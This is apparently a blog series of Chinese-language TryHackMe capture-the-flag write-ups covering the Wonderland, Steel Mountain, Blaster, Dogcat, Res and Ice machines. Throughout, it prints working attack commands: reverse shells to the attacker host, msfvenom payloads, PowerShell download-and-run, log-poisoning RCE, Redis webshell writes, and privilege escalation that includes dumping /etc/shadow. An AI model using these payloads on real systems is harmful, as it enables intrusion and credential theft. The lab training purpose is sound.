nc -nvlp 7877靶機- powershell iex (New-Object Net.WebClient).DownloadString('http://10.13.21.55:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.13.21.55 -Port 7877就成功接上了- 取得 uesr flag- 使用 msfvenom 產 meterperter reverse shell- msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.21.55 LPORT=7879 -f exe -o meow.exe
開啟 msfconsole 準備接收- use exploit/multi/handler
set LHOST 10.13.21.55
set LPORT 7879
set PAYLOAD windows/meterpreter/reverse_tcp
show options 確認參數是否正確
run 等待接收下載並執行 meterpreter 的 shell- powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.21.55:8000/meow.exe','meow.exe')"
Start-Process "meow.exe"msf 接上了!- What is the final size of the exe payload that you generated?-
73802meterperter- getuid回傳 Alfred\bruce``load incognito``list_tokens -g-
發現可以利用 BUILTIN\Administrators``impersonate_token "BUILTIN\Administrators"- 成功!
再次 whoamiMigrate 到 system- ps
準備寄生到 services.exe``migrate 668-
成功!輸入 shell- cd system
type root.txt
取得 root flagdff0f748678f280250f25a45b8046b4a

Wonderland (Try Hack Me Writeup)

Thu, 05 Aug 2021 13:30:00 +0800

URL: https://tryhackme.com/dashboard

IP : 10.10.166.15

Recon

一直 nmap 太老梗太無聊了來玩玩新東西 RustScan
wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb
sudo dpkg -i rustscan_2.0.1_amd64.deb``rustscan -a 10.10.166.15-
開 22 跟 80

網址

http://10.10.166.15/透過 dirsearch 可以找到/rhttp://10.10.166.15/r/ 再掃，可以掃到- /a
感覺每次都是一個字，所以可以爆搜看看，自己寫一個 python 腳本- import requests from multiprocessing import Pool url = 'http://10.10.166.15/r/a/' alphabat = 'abcdefghijklmnopqrstuvwxyz' def req(i): res = requests.get(f'{url}/{i}') if res.status_code == 200: print(i) p = Pool(10) p.map(req,alphabat)
如果爆到正確的就會 print 出來，然後手動把搜的結果加去 url 最後面再爆所以最後爆出的結果是r/a/b/b/i/thttp://10.10.166.15/r/a/b/b/i/t/-
觀察原始碼會發現一串奇怪的字串alice:HowDothTheLittleCrocodileImproveHisShiningTail
斷詞後發現是 How Doth The Little Crocodile Improve His Shining Tail
來自於How Doth the Little Crocodile
路易斯·卡羅創作的詩How doth the little crocodile Improve his shining tail And pour the waters of the Nile On every golden scale! How cheerfully he seems to grin How neatly spreads his claws, And welcomes little fishes in With gently smiling jaws!好…完全不重要

SSH

通靈一下，我們時常會把帳號跟密碼用 : 隔開說不定，上面那串就是 alice 的密碼！嘗試ssh登入看看ssh alice@10.10.166.15密碼 HowDothTheLittleCrocodileImproveHisShiningTail到處找了一輪，都找不到 user.txt QAQ- 算了，我們直接想辦法提權，等有 root 後再用上帝視角來搜!
但反而我們使用者alice的家目錄有一個沒有權限讀的 root.txt
輸入 sudo -l 觀察-
發現我們可以用 rabbit 使用者身分執行 /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
所以執行方法應該如下 sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

挾持 Python

觀察 walrus_and_the_carpenter.py發現內部的程式碼會 import random
這個時候我們可以透過一些小技巧挾持他的 randomPython 的 import 有一個特性- 首先他會讀取同一個資料夾裡面，是否有相同檔名的檔案來給他 Import
再來才會去找 sys.path 裡面的東西可以輸入 python3 -c "import sys; print(sys.path)" 觀察所以由於該檔案在我們家目錄，我們可以在自己家目錄下創一個 random.py- 此時如果執行該 python 檔案，即可使用我們自己的 random
我們建造的 random.py``python3 import pty pty.spawn("/bin/bash")
以 rabbit 使用者執行看看sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
就會發現我們噴成 rabbit 的 shell 了!

逆向工程

進入 rabbit 後，發現他的家目錄有一個 teaParty 的檔案透過 file teaParty 檢查會發現他是一個 ELF 執行檔透過 ls -al teaParty 會發現他有 SUID- 那不管了，我們先執行看看ㄅ!- ./teaParty
噴了一些字，還有當前時間就卡住了，感覺可以讓我輸入一些字，那就先隨便輸入個 meow 看看ㄅ
哇…… 噴出了 Segmentation fault (core dumped)
母…母湯阿，不會在這邊要開始打 pwn 了吧 QWQ好吧，那我們先把檔案抓出來分析看看- cp teaParty /tmp
chmod 777 /tmp/teaParty
本機scp alice@10.10.166.15:/tmp/teaParty .透過 Cutter 打開-
觀察 main 函數會發現，先會 set uid 跟 gid 為 0x3eb = 1003
先觀察一下 uid、gid 1003 是誰cat /etc/passwd | grep 1003
會發現是一個叫做 hatter 的使用者關於逆向這個程式，很明顯的重點就是以下三行- setuid(0x3eb);
setgid(0x3eb);
system("/bin/echo -n \'Probably by \' && date --date=\'next hour\' -R");
然後他的 Segmentation fault 是假的7777777777777777777我們可以發現他的 system 裡面主要 call 了兩個東西- 第一個是 /bin/echo
第二個是 date
在這邊我先查詢了 /bin/echo 以及 /bin/date 發現都不可以修改想到我們可以做什麼事情了嗎?- 程式裡面的 system 呼叫的是 date 而不是 /bin/date
而在 Linux 中，如果不寫完整的路徑，就會去$PATH裡面抓
所以我們可以修改 $PATH ，增加路徑，並放上我們自己ㄉ date 檔案放一個 reverse shell/bin/bash -c '/bin/bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'再給他權限- chmod +x date攻擊機準備好 reverse shell- nc -vlk 7877再輸入以下指令- PATH=/home/rabbit:$PATH ./teaParty就可以收到 reverse shell 了!!-
我們目前到了 hatter 使用者
在根目錄可以發現一組 WhyIsARavenLikeAWritingDesk? 密碼，可以以此用 ssh 登入 hatter
ssh hatter@10.10.166.15

提權

先透過 scp 把 linpeas 給傳到機器中輸入 bash linpeas.sh- 發現一些有趣的東西在 Capabilities 的地方可以看到- Files with capabilities
發現 perl 有 cap_setuid
去 GTFObins 上找就找到了 GTFObins 上面的 perl Capabilities- perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
就發現了我們拿到 root !!也就順利的拿到了 root 的 flag-
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}到 /root 看看有什麼東西-
找到了 user.txt``thm{"Curiouser and curiouser!"}
~~把user.txt放在root目錄是不是搞錯了什麼~~

Steel Mountain (Try Hack Me Writeup)

Thu, 05 Aug 2021 13:24:00 +0800

URL : https://tryhackme.com/room/steelmountain

IP : 10.10.27.172

Scan

rustscan -a 10.10.27.172
nmap -A 10.10.27.172

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 01:58 EDT
Nmap scan report for 10.10.27.172
Host is up (0.27s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2021-08-04T05:45:04
|_Not valid after: 2022-02-03T05:45:04
|_ssl-date: 2021-08-05T05:59:31+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open unknown
49156/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: , NetBIOS MAC: 02:5d:12:51:16:37 (unknown)
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-05T05:59:18
|_ start_date: 2021-08-05T05:44:25

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.76 seconds

觀察首頁http://10.10.27.172/
有一個 Employee of the month圖片網址 http://10.10.27.172/img/BillHarper.pngWho is the employee of the month?- Bill HarperScan the machine with nmap. What is the other port running a web server on?- 8080Take a look at the other web server. What file server is running?- 透過 NMAP 可以發現 HttpFileServer
公司叫做 rejetto
所以答案 Rejetto Http File ServerHFS 的版本 2.3 可以找到有一個CVE- https://www.exploit-db.com/exploits/39161
CVE-2014-6287

Exploit

下載檔案到 kaliwget https://www.exploit-db.com/download/39161 -O 39161.py
修改內部的 ip 及 port
ip_addr = "10.13.21.55"
local_port = "7878"這邊的 port 是指 reverse shell 的port另外依照 exploit 需求，需要在攻擊機 80 port 開一個 webserver，並在根目錄放一個 nc.exe- nc.exe 可以從這邊取得https://github.com/int0x33/nc.exe/blob/master/nc.exesudo python3 -m http.server 80- 使用 python 開啟 80 port 的 webserver並於本地端開啟 nc 監聽- nc -l 7877執行 exploit- python 39161.py 10.10.27.172 8080
就可以收到 shell ㄌ!-
使用 whoami 確認使用者名稱在使用者的桌面找到 user flag-
b04763b6fcf51fcd7c13abc7db4fd365

觀察提權資訊

輸入 systeminfo 可以觀察到Microsoft Windows Server 2012 R2 Datacenter
下載 WinPeas.exe 進行掃描- powershell -c wget http://10.13.21.55:8000/winPEASx64.exe -outFile winPEASx64.exe執行 Winpeas 發現有可疑ㄉ引號路徑漏洞- 觀察 Services- 可以輸入 powershell -c Get-Service 觀察目前的所有 Services
WinPeas 也已經很好心的告訴我們是 AdvancedSystemCareService9 了確認檔案與 Services 的權限- 先準備 https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk 在攻擊機
powershell -c wget http://10.13.21.55:8000/accesschk.exe -outFile accesschk.exe觀察 Services 權限- accesschk.exe /accepteula -ucqv AdvancedSystemCareService9
可以發現我們的使用者 bill
可以幫 servicesStart
Stop觀察檔案權限- accesschk -uwdq "C:\Program Files (x86)\"可以看到我們沒有權限
accesschk -uwdq "C:\Program Files (x86)\IoBit-
發現我們有 RW 權限!!透過 msfevon 產出一個 reverse shell- msfevon -p windows/x64_shell_reverse_tcp LHOST=10.13.21.55 LPORT=8877 -f exe -a Advanced.exe下載檔案並放置到 C:\Program Files (x86)- powershell -c wget http://10.13.21.55:8000/Advanced.exe -outFile Advanced.exe
準備 reverse shell 監聽nc -vlk 8877觀察 services- sc qc AdvancedSystemCareService9qc : Query system config停止 services- sc stop AdvancedSystemCareService9
重啟 services- sc start AdvancedSystemCareService9
會發現畫面卡住，因為我們的 reverse sehll 已經接上了!!
取得 root flag-
9af5f314f57607c00fd09803a587db80

Blaster (Try Hack Me Writeup)

Wed, 04 Aug 2021 23:52:00 +0800

URL : https://tryhackme.com/room/blaster

IP: 10.10.188.122

先寫在前面，這一題初學者不建議打，官方的影片跟 Writeup 都不完全適用，可能是作者重新 Deploy 過題目或是做過一些升級，所以整題難度高了非常多 QQ

Recon

老梗 nmap -A 10.10.188.122
發現有開兩個 port80
3389How many ports are open on our target system?- 2Looks like there’s a web server running, what is the title of the page we discover when browsing to it?- nmap 就告訴我們ㄌ
IIS Windows ServerInteresting, let’s see if there’s anything else on this web server by fuzzing it. What hidden directory do we discover?- 預設的 dirsearch 找不到東西這邊我用了 dirb 的 big Wordlist- python3 dirsearch.py -u http://10.10.188.122 -e all -w /usr/share/dirb/wordlists/big.txt
掃到ㄌ http://10.10.188.122/retro/透過 Wappalyzer 可以觀察到-
他是一個 WordpressNavigate to our discovered hidden directory, what potential username do we discover?- Po 文者都是 WadeCrawling through the posts, it seems like our user has had some difficulties logging in recently. What possible password do we discover?- 發現一篇文章Ready Player One I can’t believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it’s because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I’ll eventually get it down. Either way, I’m really excited to see this movie!
他說他最喜歡的書是 Ready Player One (一級玩家)
他的名字跟主角很像，主角是 Wade Owen Watts
然後他說他常常在登入時打錯他的 avatar抱歉我英文不好，查了之後才知道avatar : （網路遊戲或網路聊天室中的）虛擬化身
所以應該是電影裡面的角色名稱在這邊查詢 https://hero.fandom.com/wiki/Parzival_(Ready_Player_One)- 可以找到 Wade Owen Watts, under the virtual name Parzival所以他的密碼是 parzival- 大小寫都 try 了一次，發現是全小寫

RDP

透過 RDP 登入遠端系統xfreerdp +drives /u:Wade /v:10.10.151.248:3389
使用密碼 parzival
即可順利登入取得 user flag- THM{HACK_PLAYER_ONE}
開始工具列搜尋 system infomation-
可以看到作業系統的版本等資訊嘗試使用 winPEAS 來搜可以提權的點- powershell wget http://10.13.21.55:8000/winPEAS.bat -outfile winPEAS.bat
有 Defender 把我吃掉ㄌ QQQQ這邊依照官方的Writeup 以及教學，理論上可以在 IE 的瀏覽紀錄上找到一些蛛絲馬跡-
但我這邊看到基本上是空的QQQQ
好吧，那就當作這題是困難版的，繼續嘗試

可疑的檔案

在桌面上找到 hhupd.exe直接丟去 Google 就會看到- CVE-2019-1388 提權When enumerating a machine, it’s often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it?- 完成正規解可以在瀏覽器蛛絲馬跡上找到的答案QQ
CVE-2019-1388Looks like an executable file is necessary for exploitation of this vulnerability and the user didn’t really clean up very well after testing it. What is the name of this executable?- 桌面上的檔案 hhupd透過觀察網路上的資源- https://github.com/jas502n/CVE-2019-1388
可以發現 CVE-2019-1388 是一個很酷ㄉ洞，基本實作細節如下1. 對著 hhupd 點兩下

跳出 UAC 後，選 show more details-
選擇 Show infomation about the publisher's certificate-
點選 Issued by: 後面的超連結-
這個時候畫面還是顯示憑證資訊，我們可以按 OK 先關掉
再按 No 關閉 UAC
這個時候出現的 IE，而這個IE就是以 system 權限跑起來的-
我們可以按下 ctrl + s 把網頁存檔，目的主要是為了叫出存檔的框框
這個時候會跳出一個錯誤，不重要，直接按下 OK-
在上方路徑處輸入 cmd 或 C:\Windows\System32\cmd.exe 並按下 Enter-
會跳出一個 cmd 框框，而且是用 system 權限執行起來的-

提權完成Now that we’ve spawned a terminal, let’s go ahead and run the command ‘whoami’. What is the output of running this?- nt authority\system接下來就可以到 admin 資料夾的桌面領 root flag ㄌ- Now that we’ve confirmed that we have an elevated prompt, read the contents of root.txt on the Administrator’s desktop. What are the contents? Keep your terminal up after exploitation so we can use it in task four!- THM{COIN_OPERATED_EXPLOITATION}

Dogcat (Try Hack Me Writeup)

Mon, 02 Aug 2021 23:59:00 +0800

URL : https://tryhackme.com/room/dogcat

IP: 10.10.221.153
第一次打 Medium 的題目

Recon

先用老梗 nmap -A 10.10.221.153發現只有開 80 跟 22dirsearch- 發現基本上都沒有東西 QQ

瀏覽器亂逛

http://10.10.221.153/
會發現可以選狗勾或貓貓選貓貓會出現
網址是 http://10.10.221.153/?view=cat選狗勾- 網址是 http://10.10.221.153/?view=dog
~~不要問我為什麼不幫狗勾截圖~~嘗試 LFI- 這邊可以套一個 php 的 LFI 老梗 PHP Wrapperhttp://10.10.221.153/?view=php://filter/convert.base64-encode/resource=cat
可以發現成功噴出了一堆 base64PGltZyBzcmM9ImNhdHMvPD9waHAgZWNobyByYW5kKDEsIDEwKTsgPz4uanBnIiAvPg0K
解碼後發現是 .jpg" />
而同理解碼狗勾是 .jpg" />繞狗勾- 假設我們想要看 /etc/passwd``http://10.10.221.153/?view=php://filter/convert.base64-encode/resource=/etc/passwd
他會說 Sorry, only dogs or cats are allowed.而如果我們輸入 /etc/passwddog- 他會回傳 Here you go! 但是噴一些錯誤
因為找不到檔案，所以錯誤很合理那我們嘗試亂寫奇怪的路徑看看- http://10.10.221.153/?view=php://filter/convert.base64-encode/resource=./dog/../dog
會發現可以成功開啟狗勾嘗試觀察 index.php 內容這邊只截錄重點

可以發現參數 ext 很重要我們可以透過給予 ext 空白繞過副檔名任意 LFI- http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../index.php
http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../etc/passwd
http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../etc/apache2/apache2.conf
http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../var/log/apache2/access.log可以發現 access.log 可讀
可以透過 access.log 來做到 LFI 2 RCELFI 2 RCE- 如果在瀏覽器輸入這個10.10.221.153?A=在 log 上會變成這樣- /?A=%3C?php%20phpinfo();%20?%3C/php%3E
主要是因為 HTTP 會做到 URL Encode所以可以用 nc- nc 10.10.221.153 80
GET /MEOW?
成功!寫入 webshell- nc 10.10.221.153 80
GET /MEOW?
http://10.10.221.153/?ext=&view=./dog/../../../../../../../var/log/apache2/access.log&A=curl%20-o%20/tmp/s%20http://10.13.21.55:8000/s載入 reverse shell
在這邊發現這台電腦沒有 wget，所以用 curlhttp://10.10.221.153/?ext=&view=./dog/../../../../../../../var/log/apache2/access.log&A=bash%20/tmp/s- 執行 reverse shell
本地 nc -vlk 7877
就可以順利接到 Shell ㄌ!

Shell

在/var/www/flag.php可以找到 flag1
在 /var/www/flag.php- 可以找到 flag2
嘗試提權- 輸入 sudo -l 可以發現我們可以用 root 來 run /usr/bin/env
這邊有兩種用法/usr/bin/env ls /root就可以用 roo 來 ls /root也可以參考 gtfobins- 有 suid 的 env
env /usr/bin/sh -p取得 root flag (flag3)- THM{D1ff3r3nt_3nv1ronments_874112}

Docker 提權

不管了，先老梗的 linpeas 下去curl -o linpeas.sh 10.13.21.55:8000/linpeas.sh
/usr/bin/env /tmp/linpeas.sh
可以發現根目錄有 /.dockerenv
確定目前我們在docker中發現備份檔案-
發現有 backup.tar 跟 backup.sh
試著把檔案複製到 /var/www/html 來準備下載下載並觀察備份檔案- wget http://10.10.221.153/backup.tar
tar xf backup.tar觀察 Docker File- 發現沒什麼特別
但也發現為什麼 access log 一直有噴一個 127.0.0.1 的 curl觀察 launch.sh-
發現重點!!
他把 /opt/backup 掛載到本地的/root/container/backup所以我在 /opt/backup 寫資料會跑到本地端那問題就只剩下，我們怎麼讓本地執行觀察 backup.sh- 發現裡面就 tar cf /root/container/backup/backup.tar /root/container
但……本地端是怎麼執行的ㄋ??
突然發現上面的 backup.tar 就剛好是當前時間!所以可以推測說在遠端有一個 cron job寫入 backup.sh- 戳一個 reverse shellecho "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7878 0>&1'" >> backup.sh
本地端開 nc -vlk 7878- 拿到本地 root shell! (flag4)- THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}

Res (Try Hack Me Writeup)

Sun, 01 Aug 2021 13:13:00 +0800

URL : https://tryhackme.com/room/res

IP : 10.10.149.195

Recon

先來老梗的 nmap -A 10.10.149.195``Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-01 01:29 EDT Nmap scan report for 10.10.149.195 Host is up (0.29s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works ![](https://i.imgur.com/3PG5lnw.png)``python3 dirsearch.py -u http://10.10.149.195/ -e all- 發現完全沒東西Scan the machine, how many ports are open?- 理論上要掃全部的 port
nmap -p- 10.10.149.195雖然很有效果，但很浪費時間 QQ
掃ㄌ將近 20 分鐘QQ因為喵到下面說 port 是 ****- 所以我猜測是 1000~9999
nmap -p 1000-9999 10.10.149.195
答案 6379~其實這題題目跟 logo 就很明顯ㄌ~~Scan the machine, how many ports are open?- 2 個 port
80 與 6379What’s is the database management system installed on the server?- 6379 是 redisWhat port is the database management system running on?- 6379What’s is the version of management system installed on the server?- nmap -p6379 -A 10.10.149.195
可以看到是 6.0.7
嘗試 Google 過，找不到這個版本的 Exploit
找不到 exploit

寫入 shell

使用 redis cli 連上redis-cli -h 10.10.149.195進行連線config set dir "/var/www/html"``config set dbfilename meow.php``set x "\r\n\r\n\r\n\r\n"``save成功寫入 phpinfo寫入 web shell- config set dbfilename shell.php
set x "\r\n\r\n\r\n\r\n"
save
成功寫入 webshell 且可以使用 ls上傳 reverse shell- 本地端準備bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'
存在 s 檔案中
並使用 python3 -m http.server 開啟網頁伺服器http://10.10.149.195/shell.php?A=wget 10.13.21.55:8000/s -O /tmp/s- 把檔案存下來http://10.10.149.195/shell.php?A=cat%20/tmp/s-
確認寫入正常執行 reverse shell- 本地端準備 nc -vlk 7877
訪問 http://10.10.149.195/shell.php?A=bash%20/tmp/s
成功接上 reverse shell本地亂逛- python -c 'import pty; pty.spawn("/bin/bash")'互動式 bash尋找 user flag- 檔案在 /home/vianka/user.txt
thm{red1s_rce_w1thout_credent1als}

提權

Linpeaswget 10.13.21.55:8000/linpeas.sh下載 linpeasbash linpeas.sh | tee out.txt- 執行發現有標顏色的 suid-
xxdsuid xxd 提權- gtfobins 找到 suid xxd 讀檔https://gtfobins.github.io/gtfobins/xxd/#suid要破解密碼的話可以破 /etc/shadow 的 hash- LFILE=/etc/shadow
xxd "$LFILE" | xxd -r可以順利回傳 /etc/shadow-
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::爆破密碼- 複製 vianka 的 hash 到本地端
呼叫約翰john j.txt --wordlist=/opt/rockyou.txt
成功破解密碼為 beautiful1切換使用者- su vianka切換使用者，並切換密碼為 beautiful1確認權限- 輸入 sudo -l
發現使用者可以用 sudo使用 sudo su 切換到 root成功取得 root flag-

Ice (Try Hack Me Writeup)

Sat, 31 Jul 2021 23:59:00 +0800

URL: https://tryhackme.com/room/ice

Recon

題目建議使用 SYN Scanhttps://nmap.org/book/synscan.html
可以發現指令是 -sS
sudo nmap -sS 10.10.209.59需要 root 權限所以 sudo

└─$ sudo nmap -sS 10.10.209.59
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-31 08:58 EDT
Nmap scan report for 10.10.209.59
Host is up (0.27s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
8000/tcp open http-alt
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown

不管，還是run一次習慣的 -A 看看

sudo nmap -A 10.10.209.59
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-31 09:00 EDT
Stats: 0:01:24 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 09:02 (0:00:00 remaining)
Nmap scan report for 10.10.209.59
Host is up (0.28s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=Dark-PC
| Not valid before: 2021-07-30T12:49:58
|_Not valid after: 2022-01-29T12:49:58
|_ssl-date: 2021-07-31T13:02:27+00:00; 0s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp open http Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/31%OT=135%CT=1%CU=30419%PV=Y%DS=4%DC=T%G=Y%TM=610549
OS:E3%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS
OS:=7)OPS(O1=M506NW8ST11%O2=M506NW8ST11%O3=M506NW8NNT11%O4=M506NW8ST11%O5=M
OS:506NW8ST11%O6=M506ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=20
OS:00)ECN(R=Y%DF=Y%T=80%W=2000%O=M506NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y
OS:%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0
OS:%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=80%CD=Z)

Network Distance: 4 hops
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h15m00s, deviation: 2h30m00s, median: 0s
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: , NetBIOS MAC: 02:bd:72:1c:16:7b (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Dark-PC
| NetBIOS computer name: DARK-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-07-31T08:02:13-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-31T13:02:13
|_ start_date: 2021-07-31T12:49:56

TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 139.52 ms 10.13.0.1
2 ... 3
4 283.86 ms 10.10.209.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.04 seconds

Once the scan completes, we’ll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shutdown), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?一堆字，題目不會講重點ㄇ…他問 RDP 是什麼 Port
3389What service did nmap identify as running on port 8000? (First word of this service)- 用 -A 的 nmap 可以看出
他是 IcecastWhat does Nmap identify as the hostname of the machine? (All caps for the answer)- 一樣是 -A 的 nmap 有寫到 Host:
DARK-PC

Gain Access

Now that we’ve identified some interesting services running on our target machine, let’s do a little bit of research into one of the weirder services identified: Icecast. Icecast, or well at least this version running on our target, is heavily flawed and has a high level vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use https://www.cvedetails.com for this question and the next.我們知道他是 Icecast 就可以找到他的弱點
不過我是直接 Google Icecast RCE~~我覺得 cvedetails 的搜尋很難用~~https://www.cvedetails.com/cve/CVE-2004-1561/題目問說 Type- 所以是 Execute Code OverflowWhat is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000- CVE-2004-156After Metasploit has started, let’s search for our target exploit using the command ‘search icecast’. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in ‘RP: Metasploit’ which is recommended to be completed prior to this room, although not entirely necessary.- 開啟 msfmsfconsole輸入 search icecast 尋找 icecast 相關攻擊 module- 可以找到 module 為- exploit/windows/http/icecast_header準備 Exploit- 輸入 use 0 或 use exploit/windows/http/icecast_header
輸入 show options
可以看到我們需要輸入的參數RHOSTS
LHOSTset RHOSTS 10.10.209.59``set LHOSTS 10.13.21.55輸入 exploit

Escalate

Woohoo! We’ve gained a foothold into our victim machine! What’s the name of the shell we have now?
他自動彈回了一個 meterpreter 的 shellWhat user was running that Icecast process? The commands used in this question and the next few are taken directly from the ‘RP: Metasploit’ room.- 輸入 ps 可以看到所有的 process
而如上圖，Icecast2.exe 使用者為 DARKWhat build of Windows is the system?- 偵察系統版本有助於後續的工作
可以輸入 sysinfo 觀察
7601Now that we know some of the finer details of the system we are working with, let’s start escalating our privileges. First, what is the architecture of the process we’re running?- 如上的 sysinfo ，可以看到架構是 x64Now that we know the architecture of the process, let’s perform some further recon. While this doesn’t work the best on x64 machines, let’s now run the following command run post/multi/recon/local_exploit_suggester. This can appear to hang as it tests exploits and might take several minutes to complete- 接下來我們要使用 meterpreter 的自動 exploit 推薦器來做自動化測試
run post/multi/recon/local_exploit_suggester
Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit?- 第一個回傳的是 exploit/windows/local/bypassuac_eventvwr按下鍵盤 ctrl + z 先把 meterpreter session 丟去背景- 準備來下 explit 指令
輸入 use exploit/windows/local/bypassuac_eventvwr輸入 show options- 確認目前的 session ID-
ID 為 1設定相關參數- set session 1
